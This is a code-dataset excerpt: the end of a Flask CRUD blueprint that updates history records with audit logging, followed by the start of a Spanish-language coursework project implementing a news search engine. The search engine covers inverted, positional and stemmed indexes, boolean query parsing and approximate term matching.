db.session.query(HistoryTable).filter(HistoryTable.HISTORY_ID == table_id).first().__getattribute__(column_name)\n\n # Perform the update operation\n db.session.query(HistoryTable).filter(HistoryTable.HISTORY_ID == table_id).update({column_name: new_value})\n\n # Log the update operation\n log = LogsTable(\n table_name='History Table', \n variable_name=column_name, \n table_id=table_id, \n old_value=old_value, \n new_value=new_value, \n user=user, \n date_update=datetime.now(), \n update_type=\"Update\"\n )\n db.session.add(log)\n\n # Commit the changes\n db.session.commit()\n\n return jsonify(success=True)\n except Exception as e:\n # Log the exception for debugging\n print(str(e))\n return jsonify(success=False, message=\"An unexpected error occurred.\")\n\n@history_bp.route('/get_data_from_table')\n@login_required\ndef get_data_from_table():\n table_type = request.args.get('table')\n \n if table_type == \"cadastre_table\":\n # Join the CadastreTable with IndustryTable\n data = db.session.query(CadastreTable, IndustryTable).join(\n IndustryTable, CadastreTable.INDUSTRY_ID == IndustryTable.INDUSTRY_ID\n ).all()\n\n # Return the CADASTRE_NAME, CADASTRE_ID, INDUSTRY_NAME and CAD_GROUP\n return jsonify([\n {\n \"CADASTRE_ID\": 
row.CadastreTable.CADASTRE_ID, # added CADASTRE_ID\n \"CADASTRE_NAME\": row.CadastreTable.CADASTRE_NAME,\n \"CAD_GROUP\": row.CadastreTable.CAD_GROUP,\n \"INDUSTRY_NAME\": row.IndustryTable.INDUSTRY_NAME\n }\n for row in data\n ])\n elif table_type == \"contact_table\":\n data = db.session.query(ContactTable).all()\n return jsonify([\n {\n \"CONTACT_ID\": row.CONTACT_ID, # added CONTACT_ID\n \"CONTACT_NAME\": row.CONTACT_NAME,\n \"CONTACT_EMAIL\": row.CONTACT_EMAIL,\n \"CONTACT_PHONE\": row.CONTACT_PHONE\n }\n for row in data\n ])\n else:\n return jsonify([])\n\n@history_bp.route('/update_original_table', methods=['POST'])\n@login_required\ndef update_original_table():\n try:\n table_type = request.form.get('tableType')\n selected_id = request.form.get('selectedId')\n history_id = request.form.get('ID_UNIQUE') # Fetch ID_UNIQUE from the request\n \n # Determine the column to update based on the table type\n column_to_update = \"ID_OWNER\" if table_type == \"cadastre_table\" else \"ID_CONT_OWNER\"\n \n # Fetch the old value before updating\n old_value = db.session.query(HistoryTable).filter(HistoryTable.ID_UNIQUE == history_id).first().__getattribute__(column_to_update)\n \n # Update the original table's data using the selected row's ID\n db.session.query(HistoryTable).filter(HistoryTable.ID_UNIQUE == history_id).update({column_to_update: selected_id})\n \n # Determine the name of the table being updated for logging purposes\n if table_type == \"cadastre_table\":\n table_name = \"Cadastre Table\"\n else:\n table_name = \"Contact Table\"\n\n # Log the update operation\n user = current_user.username\n log = LogsTable(\n table_name=table_name,\n variable_name=column_to_update,\n table_id=history_id,\n old_value=str(old_value),\n new_value=str(selected_id),\n user=user,\n date_update=datetime.now(),\n update_type=\"Update\"\n )\n db.session.add(log)\n \n # Commit the changes\n db.session.commit()\n \n return jsonify(success=True)\n except Exception as e:\n print(str(e))\n return jsonify(success=False, message=\"An unexpected error occurred.\")\n","repo_name":"LucaSiila/CRUD---WEBAPP","sub_path":"blueprints/history_table.py","file_name":"history_table.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74836766565","text":"#coding: utf-8\nimport json\nfrom pickle import FALSE\nfrom nltk.stem.snowball import SnowballStemmer\nimport os\nimport re\n\n#Algoritmica\nfrom spellsuggest import SpellSuggester \nfrom spellsuggest import TrieSpellSuggester\n\n\nclass SAR_Project:\n \"\"\"\n Prototipo de la clase para realizar la indexacion y la recuperacion de noticias\n \n Preparada para todas las ampliaciones:\n parentesis + multiples indices + posicionales + stemming + permuterm + ranking de resultado\n\n Se deben completar los metodos que se indica.\n Se pueden añadir nuevas variables y nuevos metodos\n Los metodos que se añadan se deberan documentar en el codigo y explicar en la memoria\n \"\"\"\n\n # lista de campos, el booleano indica si se debe tokenizar el campo\n # NECESARIO PARA LA AMPLIACION MULTIFIELD\n fields = [(\"title\", True), (\"date\", False),\n (\"keywords\", True), (\"article\", True),\n (\"summary\", True)]\n \n \n # numero maximo de documento a mostrar cuando self.show_all es False\n SHOW_MAX = 100\n\n\n def __init__(self):\n \"\"\"\n Constructor de la classe SAR_Indexer.\n NECESARIO PARA LA VERSION MINIMA\n\n Incluye todas las variables necesaria para todas las ampliaciones.\n 
Puedes añadir más variables si las necesitas \n\n \"\"\"\n self.index = {} # hash para el indice invertido de terminos --> clave: termino, valor: posting list.\n # Si se hace la implementacion multifield, se pude hacer un segundo nivel de hashing de tal forma que:\n # self.index['title'] seria el indice invertido del campo 'title'.\n self.stemmindex = {} # hash para el índice invertido de stems --> clave: stem, valor: posting list.\n self.sindex = {} # hash para el indice invertido de stems --> clave: stem, valor: lista con los terminos que tienen ese stem\n self.ptindex = {} # hash para el indice permuterm.\n self.docs = {} # diccionario de documentos --> clave: entero(docid), valor: ruta del fichero.\n self.weight = {} # hash de terminos para el pesado, ranking de resultados. puede no utilizarse\n self.news = {} # hash de noticias --> clave entero (newid), valor: la info necesaria para diferenciar la noticia dentro de su fichero (doc_id y posición dentro del documento)\n self.tokenizer = re.compile(\"\\W+\") # expresion regular para hacer la tokenizacion\n self.stemmer = SnowballStemmer('spanish') # stemmer en castellano\n self.show_all = False # valor por defecto, se cambia con self.set_showall()\n self.show_snippet = False # valor por defecto, se cambia con self.set_snippet()\n self.use_stemming = False # valor por defecto, se cambia con self.set_stemming()\n self.use_ranking = False # valor por defecto, se cambia con self.set_ranking()\n self.tam_not = {} # hash que indica el tamaño en tokens de cada noticia, clave: termino, noticia: num_tokens\n\n #Variable añadida en Algoritmica\n self.use_approximation = False # indica si se usará aproximación de terminos por distancias, se cambia con self.set_approximation()\n\n self.IdDoc = 0 # numero de documento (archivo .json)\n self.newid = 0 # numero de noticia\n \n ###############################\n ### ###\n ### CONFIGURACION ###\n ### ###\n ###############################\n\n\n def set_showall(self, v):\n \"\"\"\n\n Cambia el modo de mostrar los resultados.\n \n input: \"v\" booleano.\n\n UTIL PARA TODAS LAS VERSIONES\n\n si self.show_all es True se mostraran todos los resultados el lugar de un maximo de self.SHOW_MAX, no aplicable a la opcion -C\n\n \"\"\"\n self.show_all = v\n\n\n def set_snippet(self, v):\n \"\"\"\n\n Cambia el modo de mostrar snippet.\n \n input: \"v\" booleano.\n\n UTIL PARA TODAS LAS VERSIONES\n\n si self.show_snippet es True se mostrara un snippet de cada noticia, no aplicable a la opcion -C\n\n \"\"\"\n self.show_snippet = v\n\n\n def set_stemming(self, v):\n \"\"\"\n\n Cambia el modo de stemming por defecto.\n \n input: \"v\" booleano.\n\n UTIL PARA LA VERSION CON STEMMING\n\n si self.use_stemming es True las consultas se resolveran aplicando stemming por defecto.\n\n \"\"\"\n self.use_stemming = v\n\n\n def set_ranking(self, v):\n \"\"\"\n\n Cambia el modo de ranking por defecto.\n \n input: \"v\" booleano.\n\n UTIL PARA LA VERSION CON RANKING DE NOTICIAS\n\n si self.use_ranking es True las consultas se mostraran ordenadas, no aplicable a la opcion -C\n\n \"\"\"\n self.use_ranking = v\n\n #AGREGADO EN ALGORITMICA\n def set_approximation(self, v, distance, threshold):\n \"\"\"\n Activa o desactiva la aproximación de términos\n \n input: \"v\" booleano.\n \"distance\" algoritmo de distancia entre cadenas a usar (string)\n \"threshold\" distancia máxima a considerar entre cadenas (int)\n\n si self.use_approximation es True los términos de las consultas podrán aproximarse a otros similares\n por algoritmos de 
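The constructor comments above describe `self.index` as term to posting list, with a second hash level for multifield indexing and per-document position lists for the positional variant. That shape in isolation, as a sketch reusing the same tokenizer regex (this is not the project's indexing code):

```python
import re

TOKENIZER = re.compile(r"\W+")

def add_document(index, doc_id, text):
    """Insert one document into a positional inverted index shaped like
    SAR_Project.index: term -> {doc_id: [positions]}."""
    for position, token in enumerate(TOKENIZER.sub(" ", text.lower()).split()):
        index.setdefault(token, {}).setdefault(doc_id, []).append(position)

index = {}
add_document(index, 0, "la casa blanca")
add_document(index, 1, "la casa roja")
assert index["casa"] == {0: [1], 1: [1]}
```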
distancia si no se encuentran resultados de esos términos\n\n \"\"\"\n self.use_approximation = v\n self.approximation_distance = distance\n self.approximation_threshold = threshold\n\n\n ###############################\n ### ###\n ### PARTE 1: INDEXACION ###\n ### ###\n ###############################\n\n\n def index_dir(self, root, **args):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n \n Recorre recursivamente el directorio \"root\" e indexa su contenido\n los argumentos adicionales \"**args\" solo son necesarios para las funcionalidades ampliadas\n\n \"\"\"\n\n self.multifield = args['multifield']\n self.positional = args['positional']\n self.stemming = args['stem']\n self.permuterm = args['permuterm']\n self.approximation = args['approximation'] #Añadido en algoritmica\n self.use_trie = args['trie'] #Añadido en algoritmica\n\n for dir, subdirs, files in os.walk(root):\n for filename in files:\n if filename.endswith('.json'):\n fullname = os.path.join(dir, filename)\n self.index_file(fullname)\n \n if self.stemming is True:\n self.make_stemming()\n self.make_inverted_stems()\n \n #Algoritmica\n if self.approximation is True:\n if self.multifield is True:\n if self.use_trie:\n self.spellsuggester = TrieSpellSuggester(vocab=self.index['article'].keys())\n else:\n self.spellsuggester = SpellSuggester(vocab=self.index['article'].keys())\n else:\n if self.use_trie:\n self.spellsuggester = TrieSpellSuggester(vocab=self.index.keys())\n else:\n self.spellsuggester = SpellSuggester(vocab=self.index.keys())\n\n ##########################################\n ## COMPLETAR PARA FUNCIONALIDADES EXTRA ##\n ##########################################\n \n\n def index_file(self, filename):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Indexa el contenido de un fichero.\n\n Para tokenizar la noticia se debe llamar a \"self.tokenize\"\n\n Dependiendo del valor de \"self.multifield\" y \"self.positional\" se debe ampliar el indexado.\n En estos casos, se recomienda crear nuevos metodos para hacer mas sencilla la implementacion\n\n input: \"filename\" es el nombre de un fichero en formato JSON Arrays (https://www.w3schools.com/js/js_json_arrays.asp).\n Una vez parseado con json.load tendremos una lista de diccionarios, cada diccionario se corresponde a una noticia\n\n \"\"\"\n IdNot = 0\n\n with open(filename) as fh:\n jlist = json.load(fh)\n self.docs[self.IdDoc]=filename\n \n\n for n in jlist: #Para cada noticia del documento\n if self.multifield is True: #Multifield está activado, coger resto de campos\n for tupla in self.fields:\n (campo,tokenizar) = tupla\n\n content = n[campo]\n self.tam_not.setdefault(campo,{})\n self.tam_not[campo].setdefault(self.newid,len(content))\n \n\n if tokenizar is True:\n self.index.setdefault(campo,{})\n tokens = self.tokenize(content) #Tokenizamos los términos\n if self.positional is True: #Creamos el indice posicional\n self.make_positionals(tokens,campo)\n else:\n for tt in tokens:\n self.index[campo].setdefault(tt,[])\n #Comprobamos que el termino no se repite\n if self.newid not in self.index[campo][tt]:\n self.index[campo].setdefault(tt,[]).append(self.newid)\n else:\n self.index.setdefault(campo,{})\n self.index[campo].setdefault(content,[])\n if self.newid not in self.index[campo][content]:\n self.index[campo][content].append(self.newid)\n\n else:\n content = n['article']\n\n self.tam_not.setdefault(self.newid,len(content))\n\n tokens = self.tokenize(content) #Tokenizamos los términos\n if self.positional is True:\n self.make_positionals(tokens)\n else:\n for 
tt in tokens:\n self.index.setdefault(tt,[])\n if self.newid not in self.index[tt]:\n excluidos = {\"title\",\"date\",\"keywords\",\"summary\"}\n if tt not in excluidos:\n self.index.setdefault(tt,[]).append(self.newid)\n\n\n\n self.news.setdefault(self.newid,[]).append((self.IdDoc,IdNot)) #Para cada noticia, indica el documento al que pertenece y su posición en el mismo\n self.newid += 1\n IdNot += 1\n self.IdDoc += 1 \n \n\n #################\n ### COMPLETAR ###\n #################\n\n\n\n def tokenize(self, text):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Tokeniza la cadena \"texto\" eliminando simbolos no alfanumericos y dividiendola por espacios.\n Puedes utilizar la expresion regular 'self.tokenizer'.\n\n params: 'text': texto a tokenizar\n\n return: lista de tokens\n\n \"\"\"\n return self.tokenizer.sub(' ', text.lower()).split()\n\n\n\n def make_positionals(self, tokens, campo='article'):\n \"\"\"\n Crea los posicionales de los tokens dentro de cada id de noticia\n\n \"\"\"\n contador = 0\n \n if self.multifield is True:\n for tt in tokens: \n self.index[campo].setdefault(tt,{}).setdefault(self.newid,[])\n if contador not in self.index[campo][tt][self.newid]:\n #Agregamos el id de noticia en el que aparece el token\n\n self.index[campo][tt][self.newid].append(contador)\n contador += 1 \n else:\n for tt in tokens: \n self.index.setdefault(tt,{}).setdefault(self.newid,[])\n if contador not in self.index[tt][self.newid]:\n #Agregamos el id de noticia en el que aparece el token\n\n self.index[tt][self.newid].append(contador)\n contador += 1 \n\n \n\n\n def make_stemming(self):\n \"\"\"\n NECESARIO PARA LA AMPLIACION DE STEMMING.\n\n Crea el indice de stemming (self.stemmindex) para los terminos de todos los indices.\n\n self.stemmer.stem(token) devuelve el stem del token\n\n \"\"\"\n if self.multifield is True:\n for campo in self.index:\n if campo != \"date\":\n self.stemmindex.setdefault(campo,{})\n for token in self.index[campo]:\n stem = self.stemmer.stem(token)\n self.stemmindex[campo].setdefault(stem,[])\n for idnot in self.index[campo][token]: #Va copiando el reverse posting del token al stem\n if idnot not in self.stemmindex[campo][stem]:\n self.stemmindex[campo][stem].append(idnot)\n\n self.stemmindex[campo][stem].sort()\n\n else:\n self.stemmindex.setdefault(campo,{})\n self.stemmindex[campo] = self.index[campo]\n else:\n for token in self.index:\n stem = self.stemmer.stem(token)\n self.stemmindex.setdefault(stem,[])\n for idnot in self.index[token]: #Va copiando el reverse posting del token al stem\n if idnot not in self.stemmindex[stem]:\n self.stemmindex[stem].append(idnot)\n\n self.stemmindex[stem].sort()\n\n\n\n\n ####################################################\n ## COMPLETAR PARA FUNCIONALIDAD EXTRA DE STEMMING ##\n ####################################################\n\n\n\n def make_inverted_stems(self):\n \"\"\"\n Crea un diccionario (self.sindex) para relacionar los stems son sus términos´\n\n \"\"\"\n \n if self.multifield is True:\n for campo in self.index:\n if campo != 'date':\n for term in self.index[campo]:\n stem = self.stemmer.stem(term)\n self.sindex.setdefault(stem,[])\n if term not in self.sindex[stem]:\n self.sindex[stem].append(term)\n else:\n for term in self.index[campo]:\n self.sindex.setdefault(term,term)\n else:\n for term in self.index:\n stem = self.stemmer.stem(term)\n self.sindex.setdefault(stem,[])\n if term not in self.sindex[stem]:\n self.sindex[stem].append(term)\n\n\n \n def make_permuterm(self):\n \"\"\"\n NECESARIO PARA LA 
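`make_stemming` above merges each term's postings into its stem's list, deduplicating and re-sorting inside the loop. The same collapse for a single non-positional field, written as a compact sketch:

```python
from nltk.stem.snowball import SnowballStemmer

def make_stem_index(index):
    """Collapse a term->postings index into stem->postings, with each
    posting list sorted and duplicate-free (single-field sketch)."""
    stemmer = SnowballStemmer("spanish")
    stem_index = {}
    for term, postings in index.items():
        stem_index.setdefault(stemmer.stem(term), set()).update(postings)
    return {stem: sorted(ids) for stem, ids in stem_index.items()}
```

Accumulating into sets and sorting once at the end avoids the repeated membership tests and per-insert sorts of the loop above.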
AMPLIACION DE PERMUTERM\n\n Crea el indice permuterm (self.ptindex) para los terminos de todos los indices.\n\n \"\"\"\n pass\n ####################################################\n ## COMPLETAR PARA FUNCIONALIDAD EXTRA DE STEMMING ##\n ####################################################\n\n\n\n\n def show_stats(self):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n \n Muestra estadisticas de los indices\n \n \"\"\"\n \n ########################################\n ## COMPLETAR PARA TODAS LAS VERSIONES ##\n ########################################\n print(\"========================\")\n if self.multifield:\n print(\"Number of indexed days: %d\" % len(self.index[\"date\"]))\n print(\"-------------------------\")\n print(\"Number of indexed news: %d\" % len(self.news))\n print(\"-------------------------\")\n print(\"TOKENS\")\n\n for t in self.index:\n print(\"#of tokens in %s: %d\" % (t, len(self.index[t])))\n print(\"-------------------------\")\n print(\"PERMUTERMS\")\n for p in self.ptindex:\n print(\"#of permuterms in %s: %d\" % (p, len(self.ptindex[p])))\n print(\"-------------------------\")\n print(\"STEMS\")\n for s in self.stemmindex:\n print(\"#of stems in %s: %d\" % (s, len(self.stemmindex[s])))\n print(\"-------------------------\")\n post = \" \"\n if self.positional == []:\n post=\" NOT \"\n print(\"Positional queries are%sallowed\" % (post))\n\n\n\n\n\n\n ###################################\n ### ###\n ### PARTE 2.1: RECUPERACION ###\n ### ###\n ###################################\n\n\n def solve_query(self, query, prev={}):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Resuelve una query.\n Debe realizar el parsing de consulta que sera mas o menos complicado en funcion de la ampliacion que se implementen\n\n\n param: \"query\": cadena con la query\n \"prev\": incluido por si se quiere hacer una version recursiva. No es necesario utilizarlo.\n\n\n return: posting list con el resultado de la query\n\n \"\"\"\n posts = {}\n operadores = []\n if query is None or len(query) == 0:\n return []\n i = 0\n \n \n \n lista_query = re.split(\" +(AND|OR) +\",query)\n for term in lista_query:\n if term not in ['AND','OR']:\n \n \n if term.find('NOT ') == 0: #Es un NOT\n string = term.split(' ')[1]\n aux = string.split(\":\")\n if len(aux) > 1:\n string = aux[1]\n campo = aux[0]\n else:\n campo = \"article\"\n if string.find('\"') == 0: #Positional\n string = string[1:len(string) - 1]\n posts[i] = self.reverse_posting(self.get_positionals(string, campo)) #Calculamos el \"NOT posicional\"\n else:\n posts[i] = self.reverse_posting(self.get_posting(string, campo)) #Calculamos el \"NOT term\"\n i+=1\n else:\n campo = \"article\"\n aux = term.split(\":\")\n if len(aux) > 1:\n term = aux[1]\n campo = aux[0]\n if term.find('\"') == 0: #Positional\n term = term[1:len(term) - 1]\n posts[i] = self.get_positionals(term, campo) #Calculamos el posting posicional\n else:\n posts[i] = self.get_posting(term,campo) #Calculamos la posting list del term\n i+=1\n else:\n operadores.append(term)\n i = 0\n for op in operadores:\n if op == 'AND':\n posts[i+1] = self.and_posting(posts[i],posts[i+1])\n i+=1\n else: #Es un OR\n posts[i+1] = self.or_posting(posts[i],posts[i+1])\n i+=1\n \n return posts[i]\n ########################################\n ## COMPLETAR PARA TODAS LAS VERSIONES ##\n ########################################\n\n \n\n def get_posting(self, term, field='article', positional=False):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Devuelve la posting list asociada a un termino. 
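`make_permuterm` is left as a stub above. The textbook way to fill it, sketched here as an assumption rather than the authors' plan, appends a terminator to every term and indexes all rotations, so a single-wildcard query becomes a prefix match:

```python
def permuterm_rotations(term):
    """All rotations of term + '$'; e.g. 'casa' -> casa$, asa$c, sa$ca, ..."""
    marked = term + "$"
    return [marked[i:] + marked[:i] for i in range(len(marked))]

def make_permuterm(index):
    """ptindex: rotation -> set of original terms (single-field sketch)."""
    ptindex = {}
    for term in index:
        for rotation in permuterm_rotations(term):
            ptindex.setdefault(rotation, set()).add(term)
    return ptindex

def wildcard_terms(ptindex, pattern):
    """Resolve a single-'*' pattern like 'ca*a': rotate so the wildcard
    sits at the end, then prefix-match against the rotations."""
    head, tail = pattern.split("*")
    prefix = tail + "$" + head
    return {t for rot, terms in ptindex.items()
            if rot.startswith(prefix) for t in terms}
```

For example, `wildcard_terms(ptindex, "ca*a")` matches both `casa` and `cata`, because each contributes a rotation starting with `a$ca`.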
\n Dependiendo de las ampliaciones implementadas \"get_posting\" puede llamar a:\n - self.get_positionals: para la ampliacion de posicionales\n - self.get_permuterm: para la ampliacion de permuterms\n - self.get_stemming: para la amplaicion de stemming\n\n\n param: \"term\": termino del que se debe recuperar la posting list.\n \"field\": campo sobre el que se debe recuperar la posting list, solo necesario si se hace la ampliacion de multiples indices\n\n return: posting list\n\n \"\"\"\n ########################################\n ## COMPLETAR PARA TODAS LAS VERSIONES ##\n ########################################\n res = []\n term = term.lower()\n if self.positional is True:\n if self.multifield is True:\n #Usamos positionals y multifield\n if self.use_stemming is True and positional is False:\n res = self.get_stemming(term, field)\n else:\n if field == 'date':\n if self.index[field].get(term) is not None:\n res = self.index[field].get(term)\n else:\n res = []\n else:\n if term in list(self.index[field].keys()):\n if list(self.index[field][term].keys()) is not None:\n res = list(self.index[field][term].keys())\n else:\n res = []\n else: res = []\n else: #No usamos multifield pero sí positionals\n if self.use_stemming is True:\n res = self.get_stemming(term)\n else:\n if self.index.get(term) is not None:\n res = list(self.index[term].keys())\n else:\n res = []\n\n else: #No usamos positionals\n if self.multifield is True:\n if self.use_stemming is True:\n res = self.get_stemming(term, field)\n else:\n if self.index[field].get(term) is not None:\n res = self.index[field].get(term)\n else:\n res = []\n else:\n if self.use_stemming is True:\n res = self.get_stemming(term)\n else:\n if self.index.get(term) is not None:\n res = self.index.get(term)\n else:\n res = []\n\n\n #Algoritmica\n if self.use_approximation is True and res == []:\n if self.positional:\n if self.stemming is False:\n if self.multifield is True:\n lista = self.spellsuggester.suggest(term, self.approximation_distance,\n threshold=self.approximation_threshold)\n for palabra in lista:\n res = self.or_posting(res, list(self.index[field][palabra].keys()))\n else:\n lista = self.spellsuggester.suggest(term, self.approximation_distance,\n self.approximation_threshold)\n for palabra in lista:\n res = self.or_posting(res, list(self.index[palabra].keys()))\n else:\n if self.stemming is False:\n if self.multifield is True:\n lista = self.spellsuggester.suggest(term, self.approximation_distance, threshold=self.approximation_threshold)\n for palabra in lista:\n res = self.or_posting(res, self.index[field][palabra])\n else:\n lista = self.spellsuggester.suggest(term, self.approximation_distance , self.approximation_threshold)\n for palabra in lista:\n res = self.or_posting(res,self.index[palabra])\n \n return res\n\n\n def get_positionals(self, terms, field='article'):\n \"\"\"\n NECESARIO PARA LA AMPLIACION DE POSICIONALES\n\n Devuelve la posting list asociada a una secuencia de terminos consecutivos.\n\n param: \"terms\": lista con los terminos consecutivos para recuperar la posting list.\n \"field\": campo sobre el que se debe recuperar la posting list, solo necesario se se hace la ampliacion de multiples indices\n\n return: posting list\n\n \"\"\"\n res = []\n postings = [] #Contendrá las noticias en las que aparecen todos los términos\n lista_terms = terms.split(' ')\n \n for term in lista_terms:\n postings.append(self.get_posting(term,field,True))\n\n i=0\n while i < len(lista_terms)-1:\n postings[i+1] = 
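`get_posting` falls back to `SpellSuggester` matches when a term's posting list comes back empty. The same fallback expressed with only the standard library, using `difflib` as a stand-in for the project's distance algorithms (an assumption for illustration, not the repository's behavior):

```python
import difflib

def approximate_posting(index, term, max_suggestions=3, cutoff=0.75):
    """Union of posting lists for vocabulary terms close to `term`.
    difflib's ratio-based matcher replaces the Levenshtein suggester."""
    hits = set()
    for candidate in difflib.get_close_matches(term, index.keys(),
                                               n=max_suggestions,
                                               cutoff=cutoff):
        hits.update(index[candidate])
    return sorted(hits)
```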
self.and_posting(postings[i],postings[i+1])\n i+=1\n\n\n \"\"\"\n Para cada noticia:\n Coger las posiciones de cada termino i y poner en pos[i]\n Hacer un AND entre pos[0] y pos[i] restando i a cada elemento (por la diferencia en posicion por palabras)\n\n\n \"\"\"\n\n if postings[i] is not None and not self.use_approximation:\n for noticia in postings[i]:\n pos = []\n for term in lista_terms:\n if self.multifield is True:\n pos.append(list(self.index[field][term][noticia]))\n else:\n pos.append(self.index[term][noticia])\n j=0\n while j < len(pos):\n pos[j] = [x-j for x in pos[j]]\n j+=1\n j=0\n while j < len(pos)-1:\n pos[j+1] = self.and_posting(pos[j],pos[j+1])\n j+=1\n if len(pos[j]) != 0:\n res.append(noticia)\n elif postings[i] is not None:\n res.extend(postings[i])\n\n if res is None:\n return []\n else:\n return res\n ########################################################\n ## COMPLETAR PARA FUNCIONALIDAD EXTRA DE POSICIONALES ##\n ########################################################\n\n\n def get_stemming(self, term, field='article'):\n \"\"\"\n NECESARIO PARA LA AMPLIACION DE STEMMING\n\n Devuelve la posting list asociada al stem de un termino.\n\n param: \"term\": termino para recuperar la posting list de su stem.\n \"field\": campo sobre el que se debe recuperar la posting list, solo necesario se se hace la ampliacion de multiples indices\n\n return: posting list\n\n \"\"\"\n if self.stemming is False:\n print(\"Stemming Desactivado\")\n exit()\n\n if self.multifield is True:\n stem = self.stemmer.stem(term)\n if field == \"date\":\n return self.stemmindex[field].get(stem)\n else:\n if self.stemmindex[field].get(stem) is not None:\n return self.stemmindex[field].get(stem)\n else:\n res = []\n else:\n stem = self.stemmer.stem(term)\n if self.stemmindex.get(stem) is not None:\n return self.stemmindex.get(stem)\n else:\n res = []\n\n\n def get_permuterm(self, term, field='article'):\n \"\"\"\n NECESARIO PARA LA AMPLIACION DE PERMUTERM\n\n Devuelve la posting list asociada a un termino utilizando el indice permuterm.\n\n param: \"term\": termino para recuperar la posting list, \"term\" incluye un comodin (* o ?).\n \"field\": campo sobre el que se debe recuperar la posting list, solo necesario se se hace la ampliacion de multiples indices\n\n return: posting list\n\n \"\"\"\n\n ##################################################\n ## COMPLETAR PARA FUNCIONALIDAD EXTRA PERMUTERM ##\n ##################################################\n\n\n\n\n def reverse_posting(self, p):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Devuelve una posting list con todas las noticias excepto las contenidas en p.\n Util para resolver las queries con NOT.\n\n\n param: \"p\": posting list\n\n\n return: posting list con todos los newid exceptos los contenidos en p\n\n \"\"\"\n \n posting = [] \n i = 0\n while ((i < len(self.news))):\n if i not in p:\n posting.append(i)\n i +=1\n\n return posting\n\n\n def and_posting(self, p1, p2):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Calcula el AND de dos posting list de forma EFICIENTE\n\n param: \"p1\", \"p2\": posting lists sobre las que calcular\n\n\n return: posting list con los newid incluidos en p1 y p2\n\n \"\"\"\n \n posting = []\n i = 0 \n j = 0\n if p1 is None and p2 is None: res = []\n while ((i < len(p1)) & (j < len(p2))):\n if p1[i] == p2[j]:\n posting.append(p2[j])\n i += 1 \n j += 1\n elif p1[i] < p2[j]:\n i += 1\n else: j += 1\n\n return posting\n\n\n def or_posting(self, p1, p2):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n 
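`get_positionals` first intersects the documents, then aligns the per-term position lists by subtracting each term's offset, so any surviving common value marks the start of the phrase. That trick in isolation, assuming the positional layout term -> {doc: [positions]} used above:

```python
def phrase_docs(index, terms):
    """Docs containing `terms` as a contiguous phrase. For each candidate
    doc, shift term i's positions left by i; a value common to every
    shifted list is a phrase start."""
    candidates = set(index.get(terms[0], {}))
    for term in terms[1:]:
        candidates &= set(index.get(term, {}))
    result = []
    for doc in sorted(candidates):
        aligned = set(index[terms[0]][doc])
        for offset, term in enumerate(terms[1:], start=1):
            aligned &= {p - offset for p in index[term][doc]}
            if not aligned:
                break
        if aligned:
            result.append(doc)
    return result
```

With the small index sketched earlier, `phrase_docs(index, ["la", "casa"])` returns `[0, 1]`, since both documents contain the two tokens at consecutive positions.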
Calcula el OR de dos posting list de forma EFICIENTE\n\n param: \"p1\", \"p2\": posting lists sobre las que calcular\n\n\n return: posting list con los newid incluidos de p1 o p2\n\n \"\"\"\n \n posting = []\n i = 0 \n j = 0\n\n\n\n while ((i < len(p1)) & (j < len(p2))):\n if p1[i] == p2[j]:\n posting.append(p1[i])\n i = i+1\n j = j+1\n elif p1[i] < p2[j]:\n posting.append(p1[i])\n i = i+1\n else:\n posting.append(p2[j])\n j = j+1\n\n while (i < len(p1)):\n posting.append(p1[i])\n i += 1\n while (j < len(p2)):\n posting.append(p2[j])\n j += 1\n\n return posting\n\n\n\n #####################################\n ### ###\n ### PARTE 2.2: MOSTRAR RESULTADOS ###\n ### ###\n #####################################\n\n\n def solve_and_count(self, query):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Resuelve una consulta y la muestra junto al numero de resultados \n\n param: \"query\": query que se debe resolver.\n\n return: el numero de noticias recuperadas, para la opcion -T\n\n \"\"\"\n result = self.solve_query(query)\n print(\"%s\\t%d\" % (query, len(result)))\n return len(result) # para verificar los resultados (op: -T)\n\n\n def solve_and_show(self, query):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Resuelve una consulta y la muestra informacion de las noticias recuperadas.\n Consideraciones:\n\n - En funcion del valor de \"self.show_snippet\" se mostrara una informacion u otra.\n - Si se implementa la opcion de ranking y en funcion del valor de self.use_ranking debera llamar a self.rank_result\n\n param: \"query\": query que se debe resolver.\n\n return: el numero de noticias recuperadas, para la opcion -T\n \n \"\"\"\n result = self.solve_query(query)\n\n \n if self.show_snippet is True or self.use_ranking is True: #Generamos snippets en orden de result\n terms = []\n lista_query = re.split(\" +(AND|OR) +\",query)\n for term in lista_query:\n if term not in ['AND','OR']:\n if term.find('NOT ') != 0: #Si no hay un not en el término\n terms.append(term)\n \n if self.show_snippet is True and len(result)>0:\n snippets = self.create_snippet(result,terms)\n if self.use_ranking is True and len(result)>0:\n result = self.rank_result(result,terms)\n \n \n print(\"========================\")\n print(\"Query: '%s'\" % query)\n print(\"Number of results: %d\" % len(result))\n i=1\n\n\n \n\n for id in result:\n \n\n (doc,position) = self.news[id][0]\n filename = self.docs[doc]\n with open(filename) as fh:\n jlist = json.load(fh)\n jlist = jlist[position]\n fecha = jlist['date']\n title = jlist['title']\n keywords = jlist['keywords']\n\n\n if self.use_ranking is True and len(result)>0:\n print(\"#%d \\t (%d)\\t (%d)\\t (%s) %s \\t (%s) \" % (i, doc, self.weight[id], fecha, title, keywords))\n else:\n print(\"#%d \\t (%d)\\t (0)\\t (%s) %s \\t (%s) \" % (i, doc, fecha, title, keywords))\n\n if self.show_snippet is True:\n for snippet in snippets[id]:\n print(\"\\t\\t %s\" % snippet)\n\n i+=1\n if i > self.SHOW_MAX and self.show_all == False:\n break\n\n \n\n print(\"========================\")\n return len(result)\n\n\n\n ########################################\n ## COMPLETAR PARA TODAS LAS VERSIONES ##\n ########################################\n def func_sort(self,noticia):\n \"\"\"\n Devuelve las puntuaciones\n\n param: \"noticia\": número de noticia\n\n \"\"\"\n \n \n return self.weight[noticia]\n\n\n\n\n def 